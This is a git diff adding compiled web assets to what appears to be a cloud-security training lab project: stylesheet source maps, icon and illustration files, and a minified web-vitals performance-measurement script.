.ql-picker-item[data-value=\"3\"]::before {\n content: 'Heading 3';\n}\n.ql-snow .ql-picker.ql-header .ql-picker-label[data-value=\"4\"]::before,\n.ql-snow .ql-picker.ql-header .ql-picker-item[data-value=\"4\"]::before {\n content: 'Heading 4';\n}\n.ql-snow .ql-picker.ql-header .ql-picker-label[data-value=\"5\"]::before,\n.ql-snow .ql-picker.ql-header .ql-picker-item[data-value=\"5\"]::before {\n content: 'Heading 5';\n}\n.ql-snow .ql-picker.ql-header .ql-picker-label[data-value=\"6\"]::before,\n.ql-snow .ql-picker.ql-header .ql-picker-item[data-value=\"6\"]::before {\n content: 'Heading 6';\n}\n.ql-snow .ql-picker.ql-header .ql-picker-item[data-value=\"1\"]::before {\n font-size: 2em;\n}\n.ql-snow .ql-picker.ql-header .ql-picker-item[data-value=\"2\"]::before {\n font-size: 1.5em;\n}\n.ql-snow .ql-picker.ql-header .ql-picker-item[data-value=\"3\"]::before {\n font-size: 1.17em;\n}\n.ql-snow .ql-picker.ql-header .ql-picker-item[data-value=\"4\"]::before {\n font-size: 1em;\n}\n.ql-snow .ql-picker.ql-header .ql-picker-item[data-value=\"5\"]::before {\n font-size: 0.83em;\n}\n.ql-snow .ql-picker.ql-header .ql-picker-item[data-value=\"6\"]::before {\n font-size: 0.67em;\n}\n.ql-snow .ql-picker.ql-font {\n width: 108px;\n}\n.ql-snow .ql-picker.ql-font .ql-picker-label::before,\n.ql-snow .ql-picker.ql-font .ql-picker-item::before {\n content: 'Sans Serif';\n}\n.ql-snow .ql-picker.ql-font .ql-picker-label[data-value=serif]::before,\n.ql-snow .ql-picker.ql-font .ql-picker-item[data-value=serif]::before {\n content: 'Serif';\n}\n.ql-snow .ql-picker.ql-font .ql-picker-label[data-value=monospace]::before,\n.ql-snow .ql-picker.ql-font .ql-picker-item[data-value=monospace]::before {\n content: 'Monospace';\n}\n.ql-snow .ql-picker.ql-font .ql-picker-item[data-value=serif]::before {\n font-family: Georgia, Times New Roman, serif;\n}\n.ql-snow .ql-picker.ql-font .ql-picker-item[data-value=monospace]::before {\n font-family: Monaco, Courier New, monospace;\n}\n.ql-snow .ql-picker.ql-size {\n width: 98px;\n}\n.ql-snow .ql-picker.ql-size .ql-picker-label::before,\n.ql-snow .ql-picker.ql-size .ql-picker-item::before {\n content: 'Normal';\n}\n.ql-snow .ql-picker.ql-size .ql-picker-label[data-value=small]::before,\n.ql-snow .ql-picker.ql-size .ql-picker-item[data-value=small]::before {\n content: 'Small';\n}\n.ql-snow .ql-picker.ql-size .ql-picker-label[data-value=large]::before,\n.ql-snow .ql-picker.ql-size .ql-picker-item[data-value=large]::before {\n content: 'Large';\n}\n.ql-snow .ql-picker.ql-size .ql-picker-label[data-value=huge]::before,\n.ql-snow .ql-picker.ql-size .ql-picker-item[data-value=huge]::before {\n content: 'Huge';\n}\n.ql-snow .ql-picker.ql-size .ql-picker-item[data-value=small]::before {\n font-size: 10px;\n}\n.ql-snow .ql-picker.ql-size .ql-picker-item[data-value=large]::before {\n font-size: 18px;\n}\n.ql-snow .ql-picker.ql-size .ql-picker-item[data-value=huge]::before {\n font-size: 32px;\n}\n.ql-snow .ql-color-picker.ql-background .ql-picker-item {\n background-color: #fff;\n}\n.ql-snow .ql-color-picker.ql-color .ql-picker-item {\n background-color: #000;\n}\n.ql-toolbar.ql-snow {\n border: 1px solid #ccc;\n box-sizing: border-box;\n font-family: 'Helvetica Neue', 'Helvetica', 'Arial', sans-serif;\n padding: 8px;\n}\n.ql-toolbar.ql-snow .ql-formats {\n margin-right: 15px;\n}\n.ql-toolbar.ql-snow .ql-picker-label {\n border: 1px solid transparent;\n}\n.ql-toolbar.ql-snow .ql-picker-options {\n border: 1px solid transparent;\n box-shadow: rgba(0,0,0,0.2) 0 2px 8px;\n}\n.ql-toolbar.ql-snow .ql-picker.ql-expanded .ql-picker-label {\n border-color: #ccc;\n}\n.ql-toolbar.ql-snow .ql-picker.ql-expanded .ql-picker-options {\n border-color: #ccc;\n}\n.ql-toolbar.ql-snow .ql-color-picker .ql-picker-item.ql-selected,\n.ql-toolbar.ql-snow .ql-color-picker .ql-picker-item:hover {\n border-color: #000;\n}\n.ql-toolbar.ql-snow + .ql-container.ql-snow {\n border-top: 0px;\n}\n.ql-snow .ql-tooltip {\n background-color: #fff;\n border: 1px solid #ccc;\n box-shadow: 0px 0px 5px #ddd;\n color: #444;\n padding: 5px 12px;\n white-space: nowrap;\n}\n.ql-snow .ql-tooltip::before {\n content: \"Visit URL:\";\n line-height: 26px;\n margin-right: 8px;\n}\n.ql-snow .ql-tooltip input[type=text] {\n display: none;\n border: 1px solid #ccc;\n font-size: 13px;\n height: 26px;\n margin: 0px;\n padding: 3px 5px;\n width: 170px;\n}\n.ql-snow .ql-tooltip a.ql-preview {\n display: inline-block;\n max-width: 200px;\n overflow-x: hidden;\n text-overflow: ellipsis;\n vertical-align: top;\n}\n.ql-snow .ql-tooltip a.ql-action::after {\n border-right: 1px solid #ccc;\n content: 'Edit';\n margin-left: 16px;\n padding-right: 8px;\n}\n.ql-snow .ql-tooltip a.ql-remove::before {\n content: 'Remove';\n margin-left: 8px;\n}\n.ql-snow .ql-tooltip a {\n line-height: 26px;\n}\n.ql-snow .ql-tooltip.ql-editing a.ql-preview,\n.ql-snow .ql-tooltip.ql-editing a.ql-remove {\n display: none;\n}\n.ql-snow .ql-tooltip.ql-editing input[type=text] {\n display: inline-block;\n}\n.ql-snow .ql-tooltip.ql-editing a.ql-action::after {\n border-right: 0px;\n content: 'Save';\n padding-right: 0px;\n}\n.ql-snow .ql-tooltip[data-mode=link]::before {\n content: \"Enter link:\";\n}\n.ql-snow .ql-tooltip[data-mode=formula]::before {\n content: \"Enter formula:\";\n}\n.ql-snow .ql-tooltip[data-mode=video]::before {\n content: \"Enter video:\";\n}\n.ql-snow a {\n color: #06c;\n}\n.ql-container.ql-snow {\n border: 1px solid #ccc;\n}\n","@import url('https://fonts.googleapis.com/css2?family=Inter:wght@100;200;300;400;500;600;700;800;900&display=swap');\n\n* {\n\tmargin: 0;\n\tpadding: 0;\n\tbox-sizing: border-box;\n\tfont-family: 'Inter', sans-serif;\n}\n\nbody {\n background-color: white;\n}\n\n/* Blog starts */\n.header {\n\tbackground-color: black;\n\tdisplay: flex;\n\tflex-direction: column;\n\tjustify-content: center;\n\talign-items: center;\n\tpadding: 20px;\n}\n\n.main-title {\n\tcolor: rgb(210, 204, 204);\n\tfont-size: 2.5em;\n\tletter-spacing: 3px;\n font-weight: 800;\n}\n\n.navbar > ul {\n\tlist-style-type: none;\n\tmargin-top: 30px;\n\t/* border: 1px solid yellow; */\n}\n\n.navbar > ul > li {\n\tdisplay: inline;\n\tmargin: 5px;\n\tpadding: 5px;\n font-weight: 800;\n}\n\n.navbar > ul > li:hover {\n background-color: rgb(56, 58, 58);\n\tborder-radius: 2px;\n}\n\n.body-card {\n display: flex;\n flex-direction: row;\n justify-content: space-evenly;\n flex-wrap: wrap;\n margin-top: 10px;\n}\n\n.body-card a, .navbar a {\n text-decoration: none;\n\tcolor: rgb(174, 170, 170);\n\tletter-spacing: 3px;\n font-weight: 900;\n\tfont-size: .75em;\n\tpadding: 7px;\n}\n\n/* .body-card img {\n\twidth: 400px;\n\tmargin-top: 30px;\n\tmargin-bottom: 15px;\n} */\n\n.body-card .card-title {\n\twidth: 400px;\n\tletter-spacing: 2px;\n\tfont-size: 0.9em;\n font-weight: 700;\n}\n\n.card > ul {\n\tlist-style-type: none;\n\tdisplay: inline;\n}\n\n.post-type-link {\n\tmargin-bottom: 10px;\n}\n\n.post-type-link > a {\n\tcolor: rgb(170, 167, 167);\n\tpadding: 0;\n\tletter-spacing: 2px;\n}\n\n.post-type-link > a:hover {\n\tcolor: rgb(3, 3, 3);\n}\n\n.card-details > ul{\n\tdisplay: inline-block;\n\tmargin: 0;\n\tpadding: 0;\n\tlist-style-type: none;\n\tmargin-top: 10px;\n}\n\n.card-details > ul > li{\n\tdisplay: inline-block;\n\tcolor: rgb(42, 42, 49);\n\tfont-size: .8em;\n\tfont-weight: 900;\n}\n\n.card-details > ul > li > a {\n\tfont-size: 1em;\n\tletter-spacing: 0.1em;\n}\n\n.card-details > ul > li > a:hover {\n\tcolor: black;\n}\n\n.card-content {\n\twidth: 400px;\n overflow: hidden;\n\tdisplay: -webkit-box;\n\t-webkit-line-clamp: 3;\n\t-webkit-box-orient: vertical;\n\tmargin-top: 15px;\n\tletter-spacing: 0.4px;\n font-weight: 400;\n\tmargin-bottom: 20px;\n}\n\n.load-more-button {\n\tdisplay: flex;\n\tflex-direction: row;\n\tjustify-content: center;\n\tmargin-bottom: 50px;\n}\n\n.load-more-button > button {\n\tbackground-color: black;\n\tcolor: white;\n\tpadding: 10px;\n\twidth: 200px;\n\tcursor: pointer;\n\tletter-spacing: 0.2em;\n}\n\n.footer {\n\tposition: absolute;\n\tbackground-color: black;\n\twidth: 100%;\n\tcolor: white;\n\tfont-family: Inter;\n\tpadding: 30px;\n\tcolor: rgb(210, 204, 204);\n\tfont-size: 2.5em;\n\tletter-spacing: 3px;\n\tdisplay: flex;\n\tflex-direction: row;\n\tjustify-content: center;\n\talign-items: center;\n}\n\n.input-name {\n margin: 0;\n\tbackground-color: white;\n\theight: 40px;\n\tcolor: black;\n\tfont-family: Inter;\n\tpadding: 5px;\n\tborder-radius: 7px;\n\twidth: 500px;\n margin-right: 60px;\n margin-top: 4px;\n}\n\n.search-btn, .admin-save-btn {\n\tbackground-color: white;\n\tpadding: 3px;\n\twidth: 100px;\n\tcursor: pointer;\n font-weight: 700;\n line-height: 3px;\n\tfont-family: Inter;\n\theight: 35px;\n}\n\n.admin-content {\n\tdisplay: flex;\n\tborder: 2px solid orangered;\n\t/* justify-content: space-between; */\n}\n\n.admin-title {\n\twidth: 50rem;\n\theight: 3rem;\n\tborder: 0.2px solid grey;\n\tborder-radius: 10px;\n\tletter-spacing: .9px;\n\tpadding: 20px;\n\tfont-size: 1.1rem;\n\tbackground-color: rgb(245, 247, 247);\n}\n\n.admin-save-btn {\n\tborder: 0;\n\theight: 3rem;\n\tborder-radius: 10px;\n\tletter-spacing: 1.3px;\n\tfont-size: 0.9rem;\n\tbackground-color: rgb(235, 169, 37);\n}\n\n.admin-save-btn:active {\n\ttransform: translateY(3px);\n}\n\n.admin-editor {\n\tdisplay: flex;\n\tborder: 1px solid greenyellow;\n}\n\n.admin-editor-content {\n\tborder: 5px solid brown;\n}\n\n/* Sidebar starts */\n.sidebar {\n display: flex;\n}\n\n.sidebar .logo {\n width: 110px;\n margin-left: 20px;\n margin-top: 1px;\n\n}\n\n.sidebar .nav-menu {\n display: flex;\n background-color: rgb(25, 24, 59);\n width: 220px;\n height: 100vh;\n justify-content: center;\n position: fixed;\n}\n\n.nav-text {\n display: flex;\n justify-content: flex-start;\n align-items: center;\n padding: 8px 0px 8px 16px;\n list-style: none;\n height: 60px;\n}\n\n.nav-text a {\n text-decoration:none;\n color:#f5f5f5;\n font-size:18px;\n width:95%;\n height:100%;\n display:flex;\n align-items:center;\n padding:16px;\n border-radius:4px;\n letter-spacing: 0.5px;\n}\n\n.nav-text:hover {\n background-color: rgb(49, 57, 100);\n}\n\n.nav-menu-items {\n margin-top: 20px;\n width: 100%;\n}\n\n.sidebar span {\n margin-left: 16px;\n}\n\n/* Prosemirror Tiptap */\nBasic editor styles\n\n.ProseMirror > * + * {\n margin-top: 0.75em;\n}\n.ProseMirror ul, .ProseMirror ol {\n padding: 0 1rem;\n}\n.ProseMirror h1, .ProseMirror h2, .ProseMirror h3, .ProseMirror h4, .ProseMirror h5, .ProseMirror h6 {\n line-height: 1.1;\n}\n.ProseMirror code {\n background-color: rgba(97, 97, 97, 0.1);\n color: #616161;\n}\n.ProseMirror pre {\n background: #a3a0a0;\n color: #fff;\n font-family: 'JetBrainsMono', monospace;\n padding: 0.75rem 1rem;\n border-radius: 0.5rem;\n}\n.ProseMirror pre code {\n color: black;\n padding: 0;\n background: none;\n font-size: 0.8rem;\n}\n.ProseMirror img {\n max-width: 100%;\n height: auto;\n}\n.ProseMirror blockquote {\n padding-left: 1rem;\n border-left: 2px solid rgba(13, 13, 13, 0.1);\n}\n.ProseMirror hr {\n border: none;\n border-top: 2px solid rgba(13, 13, 13, 0.1);\n margin: 2rem 0;\n}\n\n\n/* Pages start */\n.dashboard,\n.profile,\n.posts,\n.author,\n.settings {\n margin-top: 40px;\n margin-left: 270px;\n margin-right: 50px;\n padding: 10px;\n display: flex;\n /* border: 1px solid orange; */\n}\n\n.settings {\n display: block;\n}\n\n.posts-div {\n display: flex;\n flex: 2.35 1 25%;\n /* border: 1px solid orangered; */\n}\n\n.posts-btn-div {\n display: flex;\n justify-content: flex-end;\n /* border: 1px solid black; */\n flex-grow: 1;\n}\n\n.newpost-editor {\n flex: 3 1 33.33%;\n /* margin-top: 40px; */\n /* margin-left: 270px; */\n /* margin-right: 50px; */\n /* width: 73%; */\n height: 500px;\n /* margin-bottom: 100px; */\n border: 1px solid rgb(222, 217, 217);\n overflow: scroll;\n padding: 40px;\n border-radius: 10px;\n}\n\n.newpost-editor-leftdetails {\n flex-grow: 1;\n display: flex;\n flex-direction: column;\n gap: 3em;\n justify-content: space-between;\n align-items: flex-end;\n}\n\n.newpost-editor-leftdetails-author-select span {\n font-weight: 500;\n font-size: 14px;\n}\n\n.post-image-upload {\n display: flex;\n flex-direction: column;\n justify-content: flex-end;\n align-items: flex-end;\n}\n\n.post-image-upload img {\n width: 200px;\n border: 0.4px solid rgb(217, 211, 199);\n border-radius: 10px;\n}\n\n.posts-title,\n.posts-btn {\n border: 0.1px solid grey;\n border-radius: 10px;\n padding: 10px;\n font-size: 1em;\n}\n\n.posts-title {\n flex-grow: 1;\n background-color: rgb(239, 242, 245);\n}\n\n.posts-btn {\n background-color: rgb(56, 77, 162);\n color: white;\n width: 100px;\n}\n\n.posts-btn:hover {\n background-color: rgb(40, 111, 187);\n cursor: pointer;\n}\n\n.posts-btn:active {\n transform: translateY(3px);\n}\n\n.image-input-class {\n /* border: 1px solid orange; */\n width: 200px;\n margin-top: 10px;\n background-color: #ecca74;\n font-weight: 600;\n}\n\n.editor {\n /* border: 1px solid black; */\n height: 250px;\n /* word-wrap: break-word; */\n}\n\n.author {\n display: flex;\n justify-content: center;\n align-items: center;\n /* border: 1px solid black; */\n}\n\nh2 {\n font-size: 2rem;\n}\n\n.author-content {\n display: flex;\n justify-content: space-between;\n align-items: center;\n}\n\n.author-btn-div {\n display: flex;\n justify-content: center;\n align-items: center;\n margin-left: 230px;\n}\n\n.data-grid {\n display: flex;\n justify-content: center;\n align-items: center;\n height: 59vh;\n}\n\n.login-main-container {\n border: 0.5px solid rgb(205, 195, 195);\n width: 80%;\n height: 80vh;\n display: flex;\n justify-content: flex-start;\n margin: auto;\n margin-top: 10vh;\n border-radius: 10px;\n box-shadow: 4px 4px 4px 4px rgb(230, 236, 236);\n}\n\n.login-image {\n width: 50%;\n height: 100%;\n border-top-left-radius: 10px;\n border-bottom-left-radius: 10px;\n margin-top: 0vh;\n}\n\n.login-secondary-container {\n /* border: 1px solid orange; */\n width: 80%;\n height: 80%;\n margin: auto;\n margin-left: 100px;\n margin-right: 100px;\n}\n\n.login-secondary-container-signup {\n height: 98%;\n}\n\n.h3-login-container {\n /* border: 1px solid black; */\n height: 20vh;\n width: 95%;\n margin-left: 2.5%;\n margin-right: 2.5%;\n display: flex;\n flex-direction: column;\n justify-content: flex-end;\n align-items: flex-start;\n}\n\n.h3-login-container-signup {\n justify-content: flex-start;\n height: 2vh;\n width: 100%;\n margin-left: -1.5px;\n align-items: center;\n}\n\n.h3-login-container-reset {\n justify-content: center;\n height: 10vh;\n}\n\n.h3-login {\n font-weight: 100;\n letter-spacing: 1px;\n}\n\n.login-form-container {\n margin-top: 30px;\n /* border: 1px solid rgb(152, 5, 5); */\n height: 20vh;\n width: 95%;\n margin-left: 2.5%;\n margin-right: 2.5%;\n}\n\n.login-form-container-signup {\n margin-top: 5px;\n}\n\n.login-form-container-reset {\n margin-top: 0;\n height: 30vh;\n}\n\n.login-span {\n margin-left: 0%;\n font-size: 14px;\n}\n\n.login-span-signup {\n font-size: 12px;\n}\n\n.login-input {\n border: 0.3px solid grey;\n border-radius: 7px;\n width: 95%;\n margin-top: 10px;\n height: 40px;\n padding: 10px;\n}\n\n.login-input-signup {\n margin-top: 4px;\n padding: 5px;\n}\n\n.login-button-container-main {\n margin-top: 15px;\n /* border: 1px solid rgb(152, 5, 5); */\n height: 20vh;\n width: 95%;\n margin-left: 2.5%;\n margin-right: 2.5%;\n}\n\n.login-button-container-main-reset {\n margin-top: 60px;\n}\n\n.login-button-container {\n width: 95%;\n padding: 15px;\n border-radius: 7px;\n background-color: #3554d2;\n color: white;\n font-size: 15px;\n border: 0px;\n cursor: pointer;\n}\n\n.login-button-container:active {\n transform: translateY(3px);\n}\n\n.login-signup-button {\n color: rgb(31, 31, 92);\n letter-spacing: 0px;\n}\n\n.login-reset-password {\n color: rgb(31, 31, 92);\n letter-spacing: 0px;\n float: right;\n margin-right: 10px;\n margin-top: -2px;\n}\n\n.signup-select {\n padding: 10px;\n border-radius: 7px;\n margin: 10px;\n margin-left: -2px;\n margin-bottom: 2px;\n}\n\n.settings-title {\n font-size: 1.5rem;\n letter-spacing: 0.9px;\n}\n\n.settings-div {\n border: 0.7px solid rgb(232, 226, 226);\n margin-top: 30px;\n border-radius: 10px;\n padding: 30px;\n box-shadow: 2px 2px 2px 2px rgb(230, 236, 236);\n}\n\n.settings-menu-title {\n font-size: 1.1rem;\n margin-bottom: 10px;\n}\n\n.change-password-form {\n padding: 20px;\n}\n\n.settings-menu-sub-heading-span {\n display: inline-block;\n font-weight: 500;\n letter-spacing: 0.3px;\n font-size: 16px;\n margin-bottom: 5px;\n margin-left: 17px;\n}\n\n.settings-menu-sub-heading-input {\n height: 35px;\n margin-left: 17px;\n margin-bottom: 15px;\n width: 300px;\n padding: 10px;\n letter-spacing: 1px;\n border-radius: 10px;\n border: 1px solid rgb(191, 187, 187);\n background-color: rgb(250, 250, 249);\n}\n\n.author-name {\n margin: 0;\n}\n\n.settings-menu-sub-heading-submit {\n margin-left: 18px;\n height: 40px;\n width: 300px;\n padding: 10px;\n letter-spacing: 1px;\n border-radius: 10px;\n border: 0;\n background-color: #2C974B;\n font-size: 16px;\n color: white;\n cursor: pointer;\n}\n\n.profile {\n display: block;\n border: 1px solid black;\n}\n\n.editorcontent {\n margin-top: 10px;\n /* border: 1px solid black; */\n line-height: 1.7em;\n padding: 30px;\n}\n.emailUserListClass {\n -webkit-user-select: none;\n -moz-user-select: none;\n -ms-user-select: none;\n user-select: none;\n}"],"names":[],"sourceRoot":""} \ No newline at end of file diff --git a/modules/module-1/resources/storage_account/webfiles/build/static/icons/ic_flag_de.svg b/modules/module-1/resources/storage_account/webfiles/build/static/icons/ic_flag_de.svg new file mode 100644 index 0000000..c361707 --- /dev/null +++ b/modules/module-1/resources/storage_account/webfiles/build/static/icons/ic_flag_de.svg @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/modules/module-1/resources/storage_account/webfiles/build/static/icons/ic_flag_en.svg b/modules/module-1/resources/storage_account/webfiles/build/static/icons/ic_flag_en.svg new file mode 100644 index 0000000..485ad5c --- /dev/null +++ b/modules/module-1/resources/storage_account/webfiles/build/static/icons/ic_flag_en.svg @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/modules/module-1/resources/storage_account/webfiles/build/static/icons/ic_flag_fr.svg b/modules/module-1/resources/storage_account/webfiles/build/static/icons/ic_flag_fr.svg new file mode 100644 index 0000000..2ae63a1 --- /dev/null +++ b/modules/module-1/resources/storage_account/webfiles/build/static/icons/ic_flag_fr.svg @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/modules/module-1/resources/storage_account/webfiles/build/static/icons/ic_notification_chat.svg b/modules/module-1/resources/storage_account/webfiles/build/static/icons/ic_notification_chat.svg new file mode 100644 index 0000000..0fa6d65 --- /dev/null +++ b/modules/module-1/resources/storage_account/webfiles/build/static/icons/ic_notification_chat.svg @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/modules/module-1/resources/storage_account/webfiles/build/static/icons/ic_notification_mail.svg b/modules/module-1/resources/storage_account/webfiles/build/static/icons/ic_notification_mail.svg new file mode 100644 index 0000000..524fc75 --- /dev/null +++ b/modules/module-1/resources/storage_account/webfiles/build/static/icons/ic_notification_mail.svg @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/modules/module-1/resources/storage_account/webfiles/build/static/icons/ic_notification_package.svg b/modules/module-1/resources/storage_account/webfiles/build/static/icons/ic_notification_package.svg new file mode 100644 index 0000000..87f3b79 --- /dev/null +++ b/modules/module-1/resources/storage_account/webfiles/build/static/icons/ic_notification_package.svg @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/modules/module-1/resources/storage_account/webfiles/build/static/icons/ic_notification_shipping.svg b/modules/module-1/resources/storage_account/webfiles/build/static/icons/ic_notification_shipping.svg new file mode 100644 index 0000000..da3d5ad --- /dev/null +++ b/modules/module-1/resources/storage_account/webfiles/build/static/icons/ic_notification_shipping.svg @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/modules/module-1/resources/storage_account/webfiles/build/static/icons/shape-avatar.svg b/modules/module-1/resources/storage_account/webfiles/build/static/icons/shape-avatar.svg new file mode 100644 index 0000000..38aac7e --- /dev/null +++ b/modules/module-1/resources/storage_account/webfiles/build/static/icons/shape-avatar.svg @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/modules/module-1/resources/storage_account/webfiles/build/static/illustrations/illustration_404.svg b/modules/module-1/resources/storage_account/webfiles/build/static/illustrations/illustration_404.svg new file mode 100644 index 0000000..d0df341 --- /dev/null +++ b/modules/module-1/resources/storage_account/webfiles/build/static/illustrations/illustration_404.svg @@ -0,0 +1,40 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/modules/module-1/resources/storage_account/webfiles/build/static/illustrations/illustration_avatar.png b/modules/module-1/resources/storage_account/webfiles/build/static/illustrations/illustration_avatar.png new file mode 100644 index 0000000..91404c8 Binary files /dev/null and b/modules/module-1/resources/storage_account/webfiles/build/static/illustrations/illustration_avatar.png differ diff --git a/modules/module-1/resources/storage_account/webfiles/build/static/illustrations/illustration_login.png b/modules/module-1/resources/storage_account/webfiles/build/static/illustrations/illustration_login.png new file mode 100644 index 0000000..74f8171 Binary files /dev/null and b/modules/module-1/resources/storage_account/webfiles/build/static/illustrations/illustration_login.png differ diff --git a/modules/module-1/resources/storage_account/webfiles/build/static/illustrations/illustration_register.png b/modules/module-1/resources/storage_account/webfiles/build/static/illustrations/illustration_register.png new file mode 100644 index 0000000..606b7d0 Binary files /dev/null and b/modules/module-1/resources/storage_account/webfiles/build/static/illustrations/illustration_register.png differ diff --git a/modules/module-1/resources/storage_account/webfiles/build/static/illustrations/register.png b/modules/module-1/resources/storage_account/webfiles/build/static/illustrations/register.png new file mode 100644 index 0000000..a85bbac Binary files /dev/null and b/modules/module-1/resources/storage_account/webfiles/build/static/illustrations/register.png differ diff --git a/modules/module-1/resources/storage_account/webfiles/build/static/js/787.8c65ad62.chunk.js b/modules/module-1/resources/storage_account/webfiles/build/static/js/787.8c65ad62.chunk.js new file mode 100644 index 0000000..a64e332 --- /dev/null +++ b/modules/module-1/resources/storage_account/webfiles/build/static/js/787.8c65ad62.chunk.js @@ -0,0 +1,2 @@ +"use strict";(self.webpackChunkawsgoat=self.webpackChunkawsgoat||[]).push([[787],{787:function(e,t,n){n.r(t),n.d(t,{getCLS:function(){return y},getFCP:function(){return g},getFID:function(){return C},getLCP:function(){return P},getTTFB:function(){return D}});var i,r,a,o,u=function(e,t){return{name:e,value:void 0===t?-1:t,delta:0,entries:[],id:"v2-".concat(Date.now(),"-").concat(Math.floor(8999999999999*Math.random())+1e12)}},c=function(e,t){try{if(PerformanceObserver.supportedEntryTypes.includes(e)){if("first-input"===e&&!("PerformanceEventTiming"in self))return;var n=new PerformanceObserver((function(e){return e.getEntries().map(t)}));return n.observe({type:e,buffered:!0}),n}}catch(e){}},f=function(e,t){var n=function n(i){"pagehide"!==i.type&&"hidden"!==document.visibilityState||(e(i),t&&(removeEventListener("visibilitychange",n,!0),removeEventListener("pagehide",n,!0)))};addEventListener("visibilitychange",n,!0),addEventListener("pagehide",n,!0)},s=function(e){addEventListener("pageshow",(function(t){t.persisted&&e(t)}),!0)},m=function(e,t,n){var i;return function(r){t.value>=0&&(r||n)&&(t.delta=t.value-(i||0),(t.delta||void 0===i)&&(i=t.value,e(t)))}},v=-1,p=function(){return"hidden"===document.visibilityState?0:1/0},d=function(){f((function(e){var t=e.timeStamp;v=t}),!0)},l=function(){return v<0&&(v=p(),d(),s((function(){setTimeout((function(){v=p(),d()}),0)}))),{get firstHiddenTime(){return v}}},g=function(e,t){var n,i=l(),r=u("FCP"),a=function(e){"first-contentful-paint"===e.name&&(f&&f.disconnect(),e.startTime-1&&e(t)},r=u("CLS",0),a=0,o=[],v=function(e){if(!e.hadRecentInput){var t=o[0],i=o[o.length-1];a&&e.startTime-i.startTime<1e3&&e.startTime-t.startTime<5e3?(a+=e.value,o.push(e)):(a=e.value,o=[e]),a>r.value&&(r.value=a,r.entries=o,n())}},p=c("layout-shift",v);p&&(n=m(i,r,t),f((function(){p.takeRecords().map(v),n(!0)})),s((function(){a=0,T=-1,r=u("CLS",0),n=m(i,r,t)})))},E={passive:!0,capture:!0},w=new Date,L=function(e,t){i||(i=t,r=e,a=new Date,F(removeEventListener),S())},S=function(){if(r>=0&&r1e12?new Date:performance.now())-e.timeStamp;"pointerdown"==e.type?function(e,t){var n=function(){L(e,t),r()},i=function(){r()},r=function(){removeEventListener("pointerup",n,E),removeEventListener("pointercancel",i,E)};addEventListener("pointerup",n,E),addEventListener("pointercancel",i,E)}(t,e):L(t,e)}},F=function(e){["mousedown","keydown","touchstart","pointerdown"].forEach((function(t){return e(t,b,E)}))},C=function(e,t){var n,a=l(),v=u("FID"),p=function(e){e.startTimeperformance.now())return;n.entries=[t],e(n)}catch(e){}},"complete"===document.readyState?setTimeout(t,0):addEventListener("load",(function(){return setTimeout(t,0)}))}}}]); +//# sourceMappingURL=787.8c65ad62.chunk.js.map \ No newline at end of file diff --git a/modules/module-1/resources/storage_account/webfiles/build/static/js/787.8c65ad62.chunk.js.map b/modules/module-1/resources/storage_account/webfiles/build/static/js/787.8c65ad62.chunk.js.map new file mode 100644 index 0000000..3b0eb0d --- /dev/null +++ b/modules/module-1/resources/storage_account/webfiles/build/static/js/787.8c65ad62.chunk.js.map @@ -0,0 +1 @@ +{"version":3,"file":"static/js/787.8c65ad62.chunk.js","mappings":"mQAAA,IAAIA,EAAEC,EAAEC,EAAEC,EAAEC,EAAE,SAASJ,EAAEC,GAAG,MAAM,CAACI,KAAKL,EAAEM,WAAM,IAASL,GAAG,EAAEA,EAAEM,MAAM,EAAEC,QAAQ,GAAGC,GAAG,MAAMC,OAAOC,KAAKC,MAAM,KAAKF,OAAOG,KAAKC,MAAM,cAAcD,KAAKE,UAAU,QAAQC,EAAE,SAAShB,EAAEC,GAAG,IAAI,GAAGgB,oBAAoBC,oBAAoBC,SAASnB,GAAG,CAAC,GAAG,gBAAgBA,KAAK,2BAA2BoB,MAAM,OAAO,IAAIlB,EAAE,IAAIe,qBAAqB,SAASjB,GAAG,OAAOA,EAAEqB,aAAaC,IAAIrB,MAAM,OAAOC,EAAEqB,QAAQ,CAACC,KAAKxB,EAAEyB,UAAS,IAAKvB,GAAG,MAAMF,MAAM0B,EAAE,SAAS1B,EAAEC,GAAG,IAAIC,EAAE,SAASA,EAAEC,GAAG,aAAaA,EAAEqB,MAAM,WAAWG,SAASC,kBAAkB5B,EAAEG,GAAGF,IAAI4B,oBAAoB,mBAAmB3B,GAAE,GAAI2B,oBAAoB,WAAW3B,GAAE,MAAO4B,iBAAiB,mBAAmB5B,GAAE,GAAI4B,iBAAiB,WAAW5B,GAAE,IAAK6B,EAAE,SAAS/B,GAAG8B,iBAAiB,YAAY,SAAS7B,GAAGA,EAAE+B,WAAWhC,EAAEC,MAAK,IAAKgC,EAAE,SAASjC,EAAEC,EAAEC,GAAG,IAAIC,EAAE,OAAO,SAASC,GAAGH,EAAEK,OAAO,IAAIF,GAAGF,KAAKD,EAAEM,MAAMN,EAAEK,OAAOH,GAAG,IAAIF,EAAEM,YAAO,IAASJ,KAAKA,EAAEF,EAAEK,MAAMN,EAAEC,OAAOiC,GAAG,EAAEC,EAAE,WAAW,MAAM,WAAWR,SAASC,gBAAgB,EAAE,KAAKQ,EAAE,WAAWV,GAAG,SAAS1B,GAAG,IAAIC,EAAED,EAAEqC,UAAUH,EAAEjC,KAAI,IAAKqC,EAAE,WAAW,OAAOJ,EAAE,IAAIA,EAAEC,IAAIC,IAAIL,GAAG,WAAWQ,YAAY,WAAWL,EAAEC,IAAIC,MAAM,OAAO,CAAKI,sBAAkB,OAAON,KAAKO,EAAE,SAASzC,EAAEC,GAAG,IAAIC,EAAEC,EAAEmC,IAAIZ,EAAEtB,EAAE,OAAO8B,EAAE,SAASlC,GAAG,2BAA2BA,EAAEK,OAAO+B,GAAGA,EAAEM,aAAa1C,EAAE2C,UAAUxC,EAAEqC,kBAAkBd,EAAEpB,MAAMN,EAAE2C,UAAUjB,EAAElB,QAAQoC,KAAK5C,GAAGE,GAAE,MAAOiC,EAAEU,OAAOC,aAAaA,YAAYC,kBAAkBD,YAAYC,iBAAiB,0BAA0B,GAAGX,EAAED,EAAE,KAAKnB,EAAE,QAAQkB,IAAIC,GAAGC,KAAKlC,EAAE+B,EAAEjC,EAAE0B,EAAEzB,GAAGkC,GAAGD,EAAEC,GAAGJ,GAAG,SAAS